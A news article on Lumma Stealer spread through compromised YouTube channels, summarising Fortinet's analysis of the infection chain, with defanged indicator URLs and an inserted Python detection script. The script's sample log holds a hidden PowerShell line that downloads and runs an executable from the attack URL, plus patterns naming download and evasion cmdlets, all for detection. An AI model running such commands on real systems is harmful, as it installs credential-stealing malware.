
YouTube channels exploited for Lumma Stealer distribution


Threat actors are deploying YouTube channels as a clandestine conduit for disseminating a variant of Lumma Stealer.

The attackers strategically compromised YouTube accounts, disguising their activities by uploading videos that appear to offer cracked software applications. These videos contain embedded malicious URLs, enticing users to download a ZIP file cleverly named ‘installer_Full_Version_V.1f2.zip.’

Attackers regularly update the files on open-source platforms like GitHub and MediaFire to avoid detection.

Cybersecurity researchers from Fortinet exposed the attack chain. Upon downloading the ZIP file, victims unknowingly initiate a multi-stage attack. An LNK file within the ZIP calls PowerShell to fetch a private .NET loader from a GitHub repository named ‘New,’ owned by an individual whom the researchers identified as John132456. The malicious payload is discreetly downloaded from a shortened URL, ‘hxxp://cutt[.]ly/lwD7B7lp,’ leading to the initial vector, ‘hxxps://github[.]com/John1323456/New/raw/main/Installer-Install-2023_v0y.6.6[.]exe.’

Lumma Stealer attack chain. | Source: Fortinet

The .NET loader, obfuscated with SmartAssembly, employs advanced techniques to evade detection. It leverages PowerShell to execute discreetly, employing properties like RedirectStandardInput, CreateNoWindow, and UseShellExecute to run without displaying a command prompt window.

The PowerShell script, extracted by the loader, dynamically fetches encrypted binary data from multiple servers based on the system date. It then decrypts and decompresses the data, obtaining a DLL file for the next stage.
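The delivery chain described above leaves a recognisable trail in process-creation telemetry: PowerShell started by Explorer (the double-clicked LNK) that reaches out to a URL shortener, and later a hidden PowerShell spawned by an unsigned loader executable. The script below is an added detection sketch, not Fortinet's or the article's code. The `parent|image|cmdline` log format and every sample line are constructed for illustration (the defanged cutt[.]ly URL is the one quoted in the article), and the rule weights and threshold are assumptions a team would tune to its own environment.

```python
"""
Detection sketch for LNK -> PowerShell -> downloader -> hidden PowerShell chains.
Added example; log format and sample events are constructed, weights are assumed.
"""
import re
from dataclasses import dataclass, field


@dataclass
class Finding:
    cmdline: str
    score: int
    reasons: list = field(default_factory=list)


# Parents that routinely launch PowerShell; any other parent earns suspicion.
SHELL_PARENTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "explorer.exe"}

HIDDEN_WINDOW = re.compile(r"-(?:w|win|windowstyle)\s+hidden", re.I)
EVASION_FLAGS = re.compile(
    r"-(?:ep|executionpolicy)\s+bypass|-nop(?:rofile)?\b|-enc(?:odedcommand)?\b", re.I)
DOWNLOAD_CMDS = re.compile(
    r"\b(?:iwr|invoke-webrequest|downloadstring|downloadfile|iex|invoke-expression)\b", re.I)
URL_SHORTENERS = re.compile(r"\b(?:cutt\.ly|bit\.ly|tinyurl\.com)\b", re.I)
RAW_HOSTING = re.compile(r"github\.com/\S+/raw/|mediafire\.com", re.I)

# (pattern, weight, reason) -- weights are assumptions, not a published scoring scheme.
RULES = [
    (HIDDEN_WINDOW, 2, "hidden window requested"),
    (EVASION_FLAGS, 2, "profile/execution-policy/encoded-command evasion flag"),
    (DOWNLOAD_CMDS, 2, "download or in-memory execution cmdlet"),
    (URL_SHORTENERS, 3, "URL shortener in command line"),
    (RAW_HOSTING, 2, "raw file-hosting URL (GitHub raw / MediaFire)"),
]

# Constructed sample telemetry: parent|image|cmdline. Lines 1 and 3 mimic the
# two PowerShell launches in the described chain; lines 2 and 4 are benign.
SAMPLE_LOG = """\
explorer.exe|powershell.exe|powershell.exe -w hidden -ep bypass -c "iwr hxxp://cutt[.]ly/lwD7B7lp -OutFile $env:TEMP\\inst.exe; Start-Process $env:TEMP\\inst.exe"
explorer.exe|notepad.exe|notepad.exe C:\\Users\\alice\\notes.txt
Installer-Install-2023_v0y.6.6.exe|powershell.exe|powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand SQBFAFgAIAAo...
cmd.exe|powershell.exe|powershell.exe Get-ChildItem C:\\logs
"""


def score_event(parent: str, image: str, cmdline: str) -> Finding:
    """Score one process-creation event; only PowerShell launches are scored."""
    finding = Finding(cmdline=cmdline, score=0)
    if image.lower() not in {"powershell.exe", "pwsh.exe"}:
        return finding
    # Undo defanging so the URL rules see what a real log line would contain.
    norm = cmdline.replace("[.]", ".").replace("hxxp", "http")
    p = parent.lower()
    if p == "explorer.exe":
        finding.score += 2
        finding.reasons.append("PowerShell started directly from Explorer (typical of a double-clicked LNK)")
    elif p not in SHELL_PARENTS:
        # Covers the loader stage: a hidden PowerShell spawned via Process.Start
        # may carry no window flags at all, so the odd parent is the signal.
        finding.score += 2
        finding.reasons.append(f"PowerShell spawned by non-shell process {parent}")
    for pattern, weight, why in RULES:
        if pattern.search(norm):
            finding.score += weight
            finding.reasons.append(why)
    return finding


def parse_log(text: str):
    """Split constructed 'parent|image|cmdline' lines into tuples."""
    events = []
    for line in text.splitlines():
        if line.strip():
            parent, image, cmdline = line.split("|", 2)
            events.append((parent, image, cmdline))
    return events


def detect(text: str, threshold: int = 5):
    """Return findings at or above the (assumed) alerting threshold, in log order."""
    return [f for f in (score_event(*ev) for ev in parse_log(text)) if f.score >= threshold]


if __name__ == "__main__":
    for f in detect(SAMPLE_LOG):
        print(f"[score {f.score}] {f.cmdline}")
        for r in f.reasons:
            print("   -", r)
```

Running it flags the Explorer-launched downloader (score 11) and the hidden PowerShell spawned by the loader executable (score 6) while leaving the two benign lines alone. The parent-process rule matters because a loader using `CreateNoWindow` and `UseShellExecute = false` can start PowerShell with an unremarkable command line; the unusual parent is then the only reliable signal in this telemetry.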

The DLL file, ‘Agacantwhitey.dll,’ is crucial to Lumma Stealer’s attack chain. It employs anti-VM and anti-debugging techniques, examining the environment, active windows, sandbox, usernames, and virtualisation platforms to ensure stealth.

Malicious YouTube channel delivering Lumma Stealer. | Source: Fortinet

The Lumma Stealer variant, written in C and sold on underground platforms, exfiltrates sensitive information from the victim’s system, including browser data, crypto wallets, and browser extensions. It establishes communication with a command and control server to enhance evasion, now using HTTPS for data exfiltration.

Threat actors have used various delivery methods to distribute Lumma Stealer. In October, we reported that hackers use Discord’s Content Delivery Network to disseminate Lumma Stealer.

Researchers have cautioned users to avoid clicking on random links on the internet and avoid downloading files from unauthorized sources.


Kumar Hemant


Deputy Editor at Candid.Technology. Hemant writes at the intersection of tech and culture and has a keen interest in science, social issues and international relations. You can contact him here: kumarhemant@pm.me
